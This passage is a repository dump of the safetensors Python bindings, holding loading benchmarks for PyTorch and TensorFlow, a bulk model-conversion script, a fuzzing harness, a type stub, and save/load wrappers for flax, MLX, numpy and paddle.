20 | tensors[f"h.{i}.attn.c_proj.weight"] = torch.zeros((768, 768))
21 | tensors[f"h.{i}.attn.c_proj.bias"] = torch.zeros((768))
22 | tensors[f"h.{i}.ln_2.weight"] = torch.zeros((768))
23 | tensors[f"h.{i}.ln_2.bias"] = torch.zeros((768))
24 | tensors[f"h.{i}.mlp.c_fc.weight"] = torch.zeros((768, 3072))
25 | tensors[f"h.{i}.mlp.c_fc.bias"] = torch.zeros((3072))
26 | tensors[f"h.{i}.mlp.c_proj.weight"] = torch.zeros((3072, 768))
27 | tensors[f"h.{i}.mlp.c_proj.bias"] = torch.zeros((768))
28 | tensors["ln_f.weight"] = torch.zeros((768))
29 | tensors["ln_f.bias"] = torch.zeros((768))
30 | return tensors
31 |
32 |
33 | def create_lora(n_layers: int):
34 | tensors = {}
35 | for i in range(n_layers):
36 | tensors[f"lora.{i}.up.weight"] = torch.zeros((32, 32))
37 | tensors[f"lora.{i}.down.weight"] = torch.zeros((32, 32))
38 | return tensors
39 |
40 |
41 | def test_pt_pt_load_cpu(benchmark):
42 | # benchmark something
43 | weights = create_gpt2(12)
44 | with tempfile.NamedTemporaryFile(delete=False) as f:
45 | torch.save(weights, f)
46 | result = benchmark(torch.load, f.name)
47 | os.unlink(f.name)
48 |
49 | for k, v in weights.items():
50 | tv = result[k]
51 | assert torch.allclose(v, tv)
52 |
53 |
54 | def test_pt_sf_load_cpu(benchmark):
55 | # benchmark something
56 | weights = create_gpt2(12)
57 | with tempfile.NamedTemporaryFile(delete=False) as f:
58 | save_file(weights, f.name)
59 | result = benchmark(load_file, f.name)
60 | os.unlink(f.name)
61 |
62 | for k, v in weights.items():
63 | tv = result[k]
64 | assert torch.allclose(v, tv)
65 |
66 |
67 | def test_pt_pt_load_cpu_small(benchmark):
68 | weights = create_lora(500)
69 | with tempfile.NamedTemporaryFile(delete=False) as f:
70 | torch.save(weights, f)
71 | result = benchmark(torch.load, f.name)
72 | os.unlink(f.name)
73 |
74 | for k, v in weights.items():
75 | tv = result[k]
76 | assert torch.allclose(v, tv)
77 |
78 |
79 | def test_pt_sf_load_cpu_small(benchmark):
80 | weights = create_lora(500)
81 | with tempfile.NamedTemporaryFile(delete=False) as f:
82 | save_file(weights, f.name)
83 | result = benchmark(load_file, f.name)
84 | os.unlink(f.name)
85 |
86 | for k, v in weights.items():
87 | tv = result[k]
88 | assert torch.allclose(v, tv)
89 |
90 |
91 | @pytest.mark.skipif(not torch.cuda.is_available(), reason="requires cuda")
92 | def test_pt_pt_load_gpu(benchmark):
93 | # benchmark something
94 | weights = create_gpt2(12)
95 | with tempfile.NamedTemporaryFile(delete=False) as f:
96 | torch.save(weights, f)
97 | result = benchmark(torch.load, f.name, map_location="cuda:0")
98 | os.unlink(f.name)
99 |
100 | for k, v in weights.items():
101 | v = v.cuda()
102 | tv = result[k]
103 | assert torch.allclose(v, tv)
104 |
105 |
106 | @pytest.mark.skipif(not torch.cuda.is_available(), reason="requires cuda")
107 | def test_pt_sf_load_gpu(benchmark):
108 | # benchmark something
109 | weights = create_gpt2(12)
110 | with tempfile.NamedTemporaryFile(delete=False) as f:
111 | save_file(weights, f.name)
112 | result = benchmark(load_file, f.name, device="cuda:0")
113 | os.unlink(f.name)
114 |
115 | for k, v in weights.items():
116 | v = v.cuda()
117 | tv = result[k]
118 | assert torch.allclose(v, tv)
119 |
120 |
121 | @pytest.mark.skipif(not hasattr(torch.backends, "mps") or not torch.backends.mps.is_available(), reason="requires mps")
122 | def test_pt_pt_load_mps(benchmark):
123 | # benchmark something
124 | weights = create_gpt2(12)
125 | with tempfile.NamedTemporaryFile(delete=False) as f:
126 | torch.save(weights, f)
127 | result = benchmark(torch.load, f.name, map_location="mps")
128 | os.unlink(f.name)
129 |
130 | for k, v in weights.items():
131 | v = v.to(device="mps")
132 | tv = result[k]
133 | assert torch.allclose(v, tv)
134 |
135 |
136 | @pytest.mark.skipif(not hasattr(torch.backends, "mps") or not torch.backends.mps.is_available(), reason="requires mps")
137 | def test_pt_sf_load_mps(benchmark):
138 | # benchmark something
139 | weights = create_gpt2(12)
140 | with tempfile.NamedTemporaryFile(delete=False) as f:
141 | save_file(weights, f.name)
142 | result = benchmark(load_file, f.name, device="mps")
143 | os.unlink(f.name)
144 |
145 | for k, v in weights.items():
146 | v = v.to(device="mps")
147 | tv = result[k]
148 | assert torch.allclose(v, tv)
149 |
--------------------------------------------------------------------------------
/bindings/python/benches/test_tf.py:
--------------------------------------------------------------------------------
1 | import os
2 | import tempfile
3 |
4 | import h5py
5 | import numpy as np
6 | import tensorflow as tf
7 |
8 | from safetensors.tensorflow import load_file, save_file
9 |
10 |
11 | def _load(filename, tensors=None, prefix=""):
12 | with h5py.File(filename, "r") as f:
13 | if tensors is None:
14 | tensors = {}
15 | for k in f.keys():
16 | if isinstance(f[k], h5py._hl.dataset.Dataset):
17 | key = k if not prefix else f"{prefix}_{k}"
18 | tensors[key] = tf.convert_to_tensor(np.array(f[k]))
19 | else:
20 | tensors.update(_load(f[k], tensors, prefix=f"{prefix}_{k}"))
21 | return tensors
22 |
23 |
24 | def _save(filename, tensors, prefix=""):
25 | with h5py.File(filename, "w") as f:
26 | for name, tensor in tensors.items():
27 | tensor = tensor.numpy()
28 | dset = f.create_dataset(name, tensor.shape, dtype=tensor.dtype)
29 | dset[:] = tensor
30 |
31 |
32 | def create_gpt2(n_layers: int):
33 | tensors = {}
34 | tensors["wte"] = tf.zeros((50257, 768))
35 | tensors["wpe"] = tf.zeros((1024, 768))
36 | for i in range(n_layers):
37 | tensors[f"h.{i}.ln_1.weight"] = tf.zeros((768,))
38 | tensors[f"h.{i}.ln_1.bias"] = tf.zeros((768,))
39 | tensors[f"h.{i}.attn.bias"] = tf.zeros((1, 1, 1024, 1024))
40 | tensors[f"h.{i}.attn.c_attn.weight"] = tf.zeros((768, 2304))
41 | tensors[f"h.{i}.attn.c_attn.bias"] = tf.zeros((2304))
42 | tensors[f"h.{i}.attn.c_proj.weight"] = tf.zeros((768, 768))
43 | tensors[f"h.{i}.attn.c_proj.bias"] = tf.zeros((768))
44 | tensors[f"h.{i}.ln_2.weight"] = tf.zeros((768))
45 | tensors[f"h.{i}.ln_2.bias"] = tf.zeros((768))
46 | tensors[f"h.{i}.mlp.c_fc.weight"] = tf.zeros((768, 3072))
47 | tensors[f"h.{i}.mlp.c_fc.bias"] = tf.zeros((3072))
48 | tensors[f"h.{i}.mlp.c_proj.weight"] = tf.zeros((3072, 768))
49 | tensors[f"h.{i}.mlp.c_proj.bias"] = tf.zeros((768))
50 | tensors["ln_f.weight"] = tf.zeros((768))
51 | tensors["ln_f.bias"] = tf.zeros((768))
52 | return tensors
53 |
54 |
55 | def test_tf_tf_load(benchmark):
56 | # benchmark something
57 | weights = create_gpt2(12)
58 | with tempfile.NamedTemporaryFile(delete=False) as f:
59 | _save(f.name, weights)
60 | result = benchmark(_load, f.name)
61 | os.unlink(f.name)
62 |
63 | for k, v in weights.items():
64 | tv = result[k]
65 | assert np.allclose(v, tv)
66 |
67 |
68 | def test_tf_sf_load(benchmark):
69 | # benchmark something
70 | weights = create_gpt2(12)
71 | with tempfile.NamedTemporaryFile(delete=False) as f:
72 | save_file(weights, f.name)
73 | result = benchmark(load_file, f.name)
74 | os.unlink(f.name)
75 |
76 | for k, v in weights.items():
77 | tv = result[k]
78 | assert np.allclose(v, tv)
79 |
--------------------------------------------------------------------------------
/bindings/python/convert_all.py:
--------------------------------------------------------------------------------
1 | """Simple utility tool to convert automatically most downloaded models"""
2 | from convert import AlreadyExists, convert
3 | from huggingface_hub import HfApi, ModelFilter, ModelSearchArguments
4 | from transformers import AutoConfig
5 |
6 |
7 | if __name__ == "__main__":
8 | api = HfApi()
9 | args = ModelSearchArguments()
10 |
11 | total = 50
12 | models = list(
13 | api.list_models(filter=ModelFilter(library=args.library.Transformers), sort="downloads", direction=-1)
14 | )[:total]
15 |
16 | correct = 0
17 | errors = set()
18 | for model in models:
19 | model = api.model_info(model.id, files_metadata=True)
20 | size = None
21 | for sibling in model.siblings:
22 | if sibling.rfilename == "pytorch_model.bin":
23 | size = sibling.size
24 | if size is None or size > 2_000_000_000:
25 | print(f"[{model.downloads}] Skipping {model.modelId} (too large {size})")
26 | continue
27 |
28 | model_id = model.modelId
29 | print(f"[{model.downloads}] {model.modelId}")
30 | try:
31 | convert(api, model_id)
32 | correct += 1
33 | except AlreadyExists as e:
34 | correct += 1
35 | print(e)
36 | except Exception as e:
37 | config = AutoConfig.from_pretrained(model_id)
38 | errors.add(config.__class__.__name__)
39 | print(e)
40 |
41 | print(f"Errors: {errors}")
42 | print(f"File size is difference {len(errors)}")
43 | print(f"Correct rate {correct}/{total} ({correct/total * 100:.2f}%)")
44 |
--------------------------------------------------------------------------------
/bindings/python/fuzz.py:
--------------------------------------------------------------------------------
1 | import datetime
2 | import sys
3 | import tempfile
4 | from collections import defaultdict
5 |
6 | import atheris
7 |
8 |
9 | with atheris.instrument_imports():
10 | from safetensors.torch import load_file
11 |
12 |
13 | EXCEPTIONS = defaultdict(int)
14 | START = datetime.datetime.now()
15 | DT = datetime.timedelta(seconds=30)
16 |
17 |
18 | def TestOneInput(data):
19 | global START
20 | with tempfile.NamedTemporaryFile() as f:
21 | f.write(data)
22 | f.seek(0)
23 | try:
24 | load_file(f.name, device=0)
25 | except Exception as e:
26 | EXCEPTIONS[str(e)] += 1
27 |
28 | if datetime.datetime.now() - START > DT:
29 | for e, n in EXCEPTIONS.items():
30 | print(e, n)
31 | START = datetime.datetime.now()
32 |
33 |
34 | atheris.Setup(sys.argv, TestOneInput)
35 | atheris.Fuzz()
36 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/__init__.py:
--------------------------------------------------------------------------------
1 | # Re-export this
2 | from ._safetensors_rust import ( # noqa: F401
3 | SafetensorError,
4 | __version__,
5 | deserialize,
6 | safe_open,
7 | serialize,
8 | serialize_file,
9 | )
10 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/__init__.pyi:
--------------------------------------------------------------------------------
1 | # Generated content DO NOT EDIT
2 | @staticmethod
3 | def deserialize(bytes):
4 | """
5 | Opens a safetensors lazily and returns tensors as asked
6 |
7 | Args:
8 | data (`bytes`):
9 | The byte content of a file
10 |
11 | Returns:
12 | (`List[str, Dict[str, Dict[str, any]]]`):
13 | The deserialized content is like:
14 | [("tensor_name", {"shape": [2, 3], "dtype": "F32", "data": b"\0\0.." }), (...)]
15 | """
16 | pass
17 |
18 | @staticmethod
19 | def serialize(tensor_dict, metadata=None):
20 | """
21 | Serializes raw data.
22 |
23 | Args:
24 | tensor_dict (`Dict[str, Dict[Any]]`):
25 | The tensor dict is like:
26 | {"tensor_name": {"dtype": "F32", "shape": [2, 3], "data": b"\0\0"}}
27 | metadata (`Dict[str, str]`, *optional*):
28 | The optional purely text annotations
29 |
30 | Returns:
31 | (`bytes`):
32 | The serialized content.
33 | """
34 | pass
35 |
36 | @staticmethod
37 | def serialize_file(tensor_dict, filename, metadata=None):
38 | """
39 | Serializes raw data into file.
40 |
41 | Args:
42 | tensor_dict (`Dict[str, Dict[Any]]`):
43 | The tensor dict is like:
44 | {"tensor_name": {"dtype": "F32", "shape": [2, 3], "data": b"\0\0"}}
45 | filename (`str`, or `os.PathLike`):
46 | The name of the file to write into.
47 | metadata (`Dict[str, str]`, *optional*):
48 | The optional purely text annotations
49 |
50 | Returns:
51 | (`NoneType`):
52 | On success return None.
53 | """
54 | pass
55 |
56 | class safe_open:
57 | """
58 | Opens a safetensors lazily and returns tensors as asked
59 |
60 | Args:
61 | filename (`str`, or `os.PathLike`):
62 | The filename to open
63 |
64 | framework (`str`):
65 | The framework you want you tensors in. Supported values:
66 | `pt`, `tf`, `flax`, `numpy`.
67 |
68 | device (`str`, defaults to `"cpu"`):
69 | The device on which you want the tensors.
70 | """
71 |
72 | def __init__(self, filename, framework, device=...):
73 | pass
74 | def __enter__(self):
75 | """
76 | Start the context manager
77 | """
78 | pass
79 | def __exit__(self, _exc_type, _exc_value, _traceback):
80 | """
81 | Exits the context manager
82 | """
83 | pass
84 | def get_slice(self, name):
85 | """
86 | Returns a full slice view object
87 |
88 | Args:
89 | name (`str`):
90 | The name of the tensor you want
91 |
92 | Returns:
93 | (`PySafeSlice`):
94 | A dummy object you can slice into to get a real tensor
95 | Example:
96 | ```python
97 | from safetensors import safe_open
98 |
99 | with safe_open("model.safetensors", framework="pt", device=0) as f:
100 | tensor_part = f.get_slice("embedding")[:, ::8]
101 |
102 | ```
103 | """
104 | pass
105 | def get_tensor(self, name):
106 | """
107 | Returns a full tensor
108 |
109 | Args:
110 | name (`str`):
111 | The name of the tensor you want
112 |
113 | Returns:
114 | (`Tensor`):
115 | The tensor in the framework you opened the file for.
116 |
117 | Example:
118 | ```python
119 | from safetensors import safe_open
120 |
121 | with safe_open("model.safetensors", framework="pt", device=0) as f:
122 | tensor = f.get_tensor("embedding")
123 |
124 | ```
125 | """
126 | pass
127 | def keys(self):
128 | """
129 | Returns the names of the tensors in the file.
130 |
131 | Returns:
132 | (`List[str]`):
133 | The name of the tensors contained in that file
134 | """
135 | pass
136 | def metadata(self):
137 | """
138 | Return the special non tensor information in the header
139 |
140 | Returns:
141 | (`Dict[str, str]`):
142 | The freeform metadata.
143 | """
144 | pass
145 |
146 | class SafetensorError(Exception):
147 | """
148 | Custom Python Exception for Safetensor errors.
149 | """
150 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/flax.py:
--------------------------------------------------------------------------------
1 | import os
2 | from typing import Dict, Optional, Union
3 |
4 | import numpy as np
5 |
6 | import jax.numpy as jnp
7 | from jax import Array
8 | from safetensors import numpy, safe_open
9 |
10 |
11 | def save(tensors: Dict[str, Array], metadata: Optional[Dict[str, str]] = None) -> bytes:
12 | """
13 | Saves a dictionary of tensors into raw bytes in safetensors format.
14 |
15 | Args:
16 | tensors (`Dict[str, Array]`):
17 | The incoming tensors. Tensors need to be contiguous and dense.
18 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
19 | Optional text only metadata you might want to save in your header.
20 | For instance it can be useful to specify more about the underlying
21 | tensors. This is purely informative and does not affect tensor loading.
22 |
23 | Returns:
24 | `bytes`: The raw bytes representing the format
25 |
26 | Example:
27 |
28 | ```python
29 | from safetensors.flax import save
30 | from jax import numpy as jnp
31 |
32 | tensors = {"embedding": jnp.zeros((512, 1024)), "attention": jnp.zeros((256, 256))}
33 | byte_data = save(tensors)
34 | ```
35 | """
36 | np_tensors = _jnp2np(tensors)
37 | return numpy.save(np_tensors, metadata=metadata)
38 |
39 |
40 | def save_file(
41 | tensors: Dict[str, Array],
42 | filename: Union[str, os.PathLike],
43 | metadata: Optional[Dict[str, str]] = None,
44 | ) -> None:
45 | """
46 | Saves a dictionary of tensors into raw bytes in safetensors format.
47 |
48 | Args:
49 | tensors (`Dict[str, Array]`):
50 | The incoming tensors. Tensors need to be contiguous and dense.
51 | filename (`str`, or `os.PathLike`)):
52 | The filename we're saving into.
53 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
54 | Optional text only metadata you might want to save in your header.
55 | For instance it can be useful to specify more about the underlying
56 | tensors. This is purely informative and does not affect tensor loading.
57 |
58 | Returns:
59 | `None`
60 |
61 | Example:
62 |
63 | ```python
64 | from safetensors.flax import save_file
65 | from jax import numpy as jnp
66 |
67 | tensors = {"embedding": jnp.zeros((512, 1024)), "attention": jnp.zeros((256, 256))}
68 | save_file(tensors, "model.safetensors")
69 | ```
70 | """
71 | np_tensors = _jnp2np(tensors)
72 | return numpy.save_file(np_tensors, filename, metadata=metadata)
73 |
74 |
75 | def load(data: bytes) -> Dict[str, Array]:
76 | """
77 | Loads a safetensors file into flax format from pure bytes.
78 |
79 | Args:
80 | data (`bytes`):
81 | The content of a safetensors file
82 |
83 | Returns:
84 | `Dict[str, Array]`: dictionary that contains name as key, value as `Array` on cpu
85 |
86 | Example:
87 |
88 | ```python
89 | from safetensors.flax import load
90 |
91 | file_path = "./my_folder/bert.safetensors"
92 | with open(file_path, "rb") as f:
93 | data = f.read()
94 |
95 | loaded = load(data)
96 | ```
97 | """
98 | flat = numpy.load(data)
99 | return _np2jnp(flat)
100 |
101 |
102 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, Array]:
103 | """
104 | Loads a safetensors file into flax format.
105 |
106 | Args:
107 | filename (`str`, or `os.PathLike`)):
108 | The name of the file which contains the tensors
109 |
110 | Returns:
111 | `Dict[str, Array]`: dictionary that contains name as key, value as `Array`
112 |
113 | Example:
114 |
115 | ```python
116 | from safetensors.flax import load_file
117 |
118 | file_path = "./my_folder/bert.safetensors"
119 | loaded = load_file(file_path)
120 | ```
121 | """
122 | result = {}
123 | with safe_open(filename, framework="flax") as f:
124 | for k in f.offset_keys():
125 | result[k] = f.get_tensor(k)
126 | return result
127 |
128 |
129 | def _np2jnp(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, Array]:
130 | for k, v in numpy_dict.items():
131 | numpy_dict[k] = jnp.array(v)
132 | return numpy_dict
133 |
134 |
135 | def _jnp2np(jnp_dict: Dict[str, Array]) -> Dict[str, np.array]:
136 | for k, v in jnp_dict.items():
137 | jnp_dict[k] = np.asarray(v)
138 | return jnp_dict
139 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/mlx.py:
--------------------------------------------------------------------------------
1 | import os
2 | from typing import Dict, Optional, Union
3 |
4 | import numpy as np
5 |
6 | import mlx.core as mx
7 | from safetensors import numpy, safe_open
8 |
9 |
10 | def save(tensors: Dict[str, mx.array], metadata: Optional[Dict[str, str]] = None) -> bytes:
11 | """
12 | Saves a dictionary of tensors into raw bytes in safetensors format.
13 |
14 | Args:
15 | tensors (`Dict[str, mx.array]`):
16 | The incoming tensors. Tensors need to be contiguous and dense.
17 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
18 | Optional text only metadata you might want to save in your header.
19 | For instance it can be useful to specify more about the underlying
20 | tensors. This is purely informative and does not affect tensor loading.
21 |
22 | Returns:
23 | `bytes`: The raw bytes representing the format
24 |
25 | Example:
26 |
27 | ```python
28 | from safetensors.mlx import save
29 | import mlx.core as mx
30 |
31 | tensors = {"embedding": mx.zeros((512, 1024)), "attention": mx.zeros((256, 256))}
32 | byte_data = save(tensors)
33 | ```
34 | """
35 | np_tensors = _mx2np(tensors)
36 | return numpy.save(np_tensors, metadata=metadata)
37 |
38 |
39 | def save_file(
40 | tensors: Dict[str, mx.array],
41 | filename: Union[str, os.PathLike],
42 | metadata: Optional[Dict[str, str]] = None,
43 | ) -> None:
44 | """
45 | Saves a dictionary of tensors into raw bytes in safetensors format.
46 |
47 | Args:
48 | tensors (`Dict[str, mx.array]`):
49 | The incoming tensors. Tensors need to be contiguous and dense.
50 | filename (`str`, or `os.PathLike`)):
51 | The filename we're saving into.
52 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
53 | Optional text only metadata you might want to save in your header.
54 | For instance it can be useful to specify more about the underlying
55 | tensors. This is purely informative and does not affect tensor loading.
56 |
57 | Returns:
58 | `None`
59 |
60 | Example:
61 |
62 | ```python
63 | from safetensors.mlx import save_file
64 | import mlx.core as mx
65 |
66 | tensors = {"embedding": mx.zeros((512, 1024)), "attention": mx.zeros((256, 256))}
67 | save_file(tensors, "model.safetensors")
68 | ```
69 | """
70 | np_tensors = _mx2np(tensors)
71 | return numpy.save_file(np_tensors, filename, metadata=metadata)
72 |
73 |
74 | def load(data: bytes) -> Dict[str, mx.array]:
75 | """
76 | Loads a safetensors file into MLX format from pure bytes.
77 |
78 | Args:
79 | data (`bytes`):
80 | The content of a safetensors file
81 |
82 | Returns:
83 | `Dict[str, mx.array]`: dictionary that contains name as key, value as `mx.array`
84 |
85 | Example:
86 |
87 | ```python
88 | from safetensors.mlx import load
89 |
90 | file_path = "./my_folder/bert.safetensors"
91 | with open(file_path, "rb") as f:
92 | data = f.read()
93 |
94 | loaded = load(data)
95 | ```
96 | """
97 | flat = numpy.load(data)
98 | return _np2mx(flat)
99 |
100 |
101 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, mx.array]:
102 | """
103 | Loads a safetensors file into MLX format.
104 |
105 | Args:
106 | filename (`str`, or `os.PathLike`)):
107 | The name of the file which contains the tensors
108 |
109 | Returns:
110 | `Dict[str, mx.array]`: dictionary that contains name as key, value as `mx.array`
111 |
112 | Example:
113 |
114 | ```python
115 | from safetensors.flax import load_file
116 |
117 | file_path = "./my_folder/bert.safetensors"
118 | loaded = load_file(file_path)
119 | ```
120 | """
121 | result = {}
122 | with safe_open(filename, framework="mlx") as f:
123 | for k in f.offset_keys():
124 | result[k] = f.get_tensor(k)
125 | return result
126 |
127 |
128 | def _np2mx(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, mx.array]:
129 | for k, v in numpy_dict.items():
130 | numpy_dict[k] = mx.array(v)
131 | return numpy_dict
132 |
133 |
134 | def _mx2np(mx_dict: Dict[str, mx.array]) -> Dict[str, np.array]:
135 | new_dict = {}
136 | for k, v in mx_dict.items():
137 | new_dict[k] = np.asarray(v)
138 | return new_dict
139 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/numpy.py:
--------------------------------------------------------------------------------
1 | import os
2 | import sys
3 | from typing import Dict, Optional, Union
4 |
5 | import numpy as np
6 |
7 | from safetensors import deserialize, safe_open, serialize, serialize_file
8 |
9 |
10 | def _tobytes(tensor: np.ndarray) -> bytes:
11 | if not _is_little_endian(tensor):
12 | tensor = tensor.byteswap(inplace=False)
13 | return tensor.tobytes()
14 |
15 |
16 | def save(tensor_dict: Dict[str, np.ndarray], metadata: Optional[Dict[str, str]] = None) -> bytes:
17 | """
18 | Saves a dictionary of tensors into raw bytes in safetensors format.
19 |
20 | Args:
21 | tensor_dict (`Dict[str, np.ndarray]`):
22 | The incoming tensors. Tensors need to be contiguous and dense.
23 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
24 | Optional text only metadata you might want to save in your header.
25 | For instance it can be useful to specify more about the underlying
26 | tensors. This is purely informative and does not affect tensor loading.
27 |
28 | Returns:
29 | `bytes`: The raw bytes representing the format
30 |
31 | Example:
32 |
33 | ```python
34 | from safetensors.numpy import save
35 | import numpy as np
36 |
37 | tensors = {"embedding": np.zeros((512, 1024)), "attention": np.zeros((256, 256))}
38 | byte_data = save(tensors)
39 | ```
40 | """
41 | flattened = {k: {"dtype": v.dtype.name, "shape": v.shape, "data": _tobytes(v)} for k, v in tensor_dict.items()}
42 | serialized = serialize(flattened, metadata=metadata)
43 | result = bytes(serialized)
44 | return result
45 |
46 |
47 | def save_file(
48 | tensor_dict: Dict[str, np.ndarray], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]] = None
49 | ) -> None:
50 | """
51 | Saves a dictionary of tensors into raw bytes in safetensors format.
52 |
53 | Args:
54 | tensor_dict (`Dict[str, np.ndarray]`):
55 | The incoming tensors. Tensors need to be contiguous and dense.
56 | filename (`str`, or `os.PathLike`)):
57 | The filename we're saving into.
58 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
59 | Optional text only metadata you might want to save in your header.
60 | For instance it can be useful to specify more about the underlying
61 | tensors. This is purely informative and does not affect tensor loading.
62 |
63 | Returns:
64 | `None`
65 |
66 | Example:
67 |
68 | ```python
69 | from safetensors.numpy import save_file
70 | import numpy as np
71 |
72 | tensors = {"embedding": np.zeros((512, 1024)), "attention": np.zeros((256, 256))}
73 | save_file(tensors, "model.safetensors")
74 | ```
75 | """
76 | flattened = {k: {"dtype": v.dtype.name, "shape": v.shape, "data": _tobytes(v)} for k, v in tensor_dict.items()}
77 | serialize_file(flattened, filename, metadata=metadata)
78 |
79 |
80 | def load(data: bytes) -> Dict[str, np.ndarray]:
81 | """
82 | Loads a safetensors file into numpy format from pure bytes.
83 |
84 | Args:
85 | data (`bytes`):
86 | The content of a safetensors file
87 |
88 | Returns:
89 | `Dict[str, np.ndarray]`: dictionary that contains name as key, value as `np.ndarray` on cpu
90 |
91 | Example:
92 |
93 | ```python
94 | from safetensors.numpy import load
95 |
96 | file_path = "./my_folder/bert.safetensors"
97 | with open(file_path, "rb") as f:
98 | data = f.read()
99 |
100 | loaded = load(data)
101 | ```
102 | """
103 | flat = deserialize(data)
104 | return _view2np(flat)
105 |
106 |
107 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, np.ndarray]:
108 | """
109 | Loads a safetensors file into numpy format.
110 |
111 | Args:
112 | filename (`str`, or `os.PathLike`)):
113 | The name of the file which contains the tensors
114 |
115 | Returns:
116 | `Dict[str, np.ndarray]`: dictionary that contains name as key, value as `np.ndarray`
117 |
118 | Example:
119 |
120 | ```python
121 | from safetensors.numpy import load_file
122 |
123 | file_path = "./my_folder/bert.safetensors"
124 | loaded = load_file(file_path)
125 | ```
126 | """
127 | result = {}
128 | with safe_open(filename, framework="np") as f:
129 | for k in f.offset_keys():
130 | result[k] = f.get_tensor(k)
131 | return result
132 |
133 |
134 | _TYPES = {
135 | "F64": np.float64,
136 | "F32": np.float32,
137 | "F16": np.float16,
138 | "I64": np.int64,
139 | "U64": np.uint64,
140 | "I32": np.int32,
141 | "U32": np.uint32,
142 | "I16": np.int16,
143 | "U16": np.uint16,
144 | "I8": np.int8,
145 | "U8": np.uint8,
146 | "BOOL": bool,
147 | }
148 |
149 |
150 | def _getdtype(dtype_str: str) -> np.dtype:
151 | return _TYPES[dtype_str]
152 |
153 |
154 | def _view2np(safeview) -> Dict[str, np.ndarray]:
155 | result = {}
156 | for k, v in safeview:
157 | dtype = _getdtype(v["dtype"])
158 | arr = np.frombuffer(v["data"], dtype=dtype).reshape(v["shape"])
159 | result[k] = arr
160 | return result
161 |
162 |
163 | def _is_little_endian(tensor: np.ndarray) -> bool:
164 | byteorder = tensor.dtype.byteorder
165 | if byteorder == "=":
166 | if sys.byteorder == "little":
167 | return True
168 | else:
169 | return False
170 | elif byteorder == "|":
171 | return True
172 | elif byteorder == "<":
173 | return True
174 | elif byteorder == ">":
175 | return False
176 | raise ValueError(f"Unexpected byte order {byteorder}")
177 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/paddle.py:
--------------------------------------------------------------------------------
1 | import os
2 | from typing import Dict, Optional, Union
3 |
4 | import numpy as np
5 |
6 | import paddle
7 | from safetensors import numpy
8 |
9 |
10 | def save(tensors: Dict[str, paddle.Tensor], metadata: Optional[Dict[str, str]] = None) -> bytes:
11 | """
12 | Saves a dictionary of tensors into raw bytes in safetensors format.
13 |
14 | Args:
15 | tensors (`Dict[str, paddle.Tensor]`):
16 | The incoming tensors. Tensors need to be contiguous and dense.
17 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
18 | Optional text only metadata you might want to save in your header.
19 | For instance it can be useful to specify more about the underlying
20 | tensors. This is purely informative and does not affect tensor loading.
21 |
22 | Returns:
23 | `bytes`: The raw bytes representing the format
24 |
25 | Example:
26 |
27 | ```python
28 | from safetensors.paddle import save
29 | import paddle
30 |
31 | tensors = {"embedding": paddle.zeros((512, 1024)), "attention": paddle.zeros((256, 256))}
32 | byte_data = save(tensors)
33 | ```
34 | """
35 | np_tensors = _paddle2np(tensors)
36 | return numpy.save(np_tensors, metadata=metadata)
37 |
38 |
39 | def save_file(
40 | tensors: Dict[str, paddle.Tensor],
41 | filename: Union[str, os.PathLike],
42 | metadata: Optional[Dict[str, str]] = None,
43 | ) -> None:
44 | """
45 | Saves a dictionary of tensors into raw bytes in safetensors format.
46 |
47 | Args:
48 | tensors (`Dict[str, paddle.Tensor]`):
49 | The incoming tensors. Tensors need to be contiguous and dense.
50 | filename (`str`, or `os.PathLike`)):
51 | The filename we're saving into.
52 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
53 | Optional text only metadata you might want to save in your header.
54 | For instance it can be useful to specify more about the underlying
55 | tensors. This is purely informative and does not affect tensor loading.
56 |
57 | Returns:
58 | `None`
59 |
60 | Example:
61 |
62 | ```python
63 | from safetensors.paddle import save_file
64 | import paddle
65 |
66 | tensors = {"embedding": paddle.zeros((512, 1024)), "attention": paddle.zeros((256, 256))}
67 | save_file(tensors, "model.safetensors")
68 | ```
69 | """
70 | np_tensors = _paddle2np(tensors)
71 | return numpy.save_file(np_tensors, filename, metadata=metadata)
72 |
73 |
74 | def load(data: bytes, device: str = "cpu") -> Dict[str, paddle.Tensor]:
75 | """
76 | Loads a safetensors file into paddle format from pure bytes.
77 |
78 | Args:
79 | data (`bytes`):
80 | The content of a safetensors file
81 |
82 | Returns:
83 | `Dict[str, paddle.Tensor]`: dictionary that contains name as key, value as `paddle.Tensor` on cpu
84 |
85 | Example:
86 |
87 | ```python
88 | from safetensors.paddle import load
89 |
90 | file_path = "./my_folder/bert.safetensors"
91 | with open(file_path, "rb") as f:
92 | data = f.read()
93 |
94 | loaded = load(data)
95 | ```
96 | """
97 | flat = numpy.load(data)
98 | return _np2paddle(flat, device)
99 |
100 |
101 | def load_file(filename: Union[str, os.PathLike], device="cpu") -> Dict[str, paddle.Tensor]:
102 | """
103 | Loads a safetensors file into paddle format.
104 |
105 | Args:
106 | filename (`str`, or `os.PathLike`)):
107 | The name of the file which contains the tensors
108 | device (`Union[Dict[str, any], str]`, *optional*, defaults to `cpu`):
109 | The device where the tensors need to be located after load.
110 | available options are all regular paddle device locations
111 |
112 | Returns:
113 | `Dict[str, paddle.Tensor]`: dictionary that contains name as key, value as `paddle.Tensor`
114 |
115 | Example:
116 |
117 | ```python
118 | from safetensors.paddle import load_file
119 |
120 | file_path = "./my_folder/bert.safetensors"
121 | loaded = load_file(file_path)
122 | ```
123 | """
124 | flat = numpy.load_file(filename)
125 | output = _np2paddle(flat, device)
126 | return output
127 |
128 |
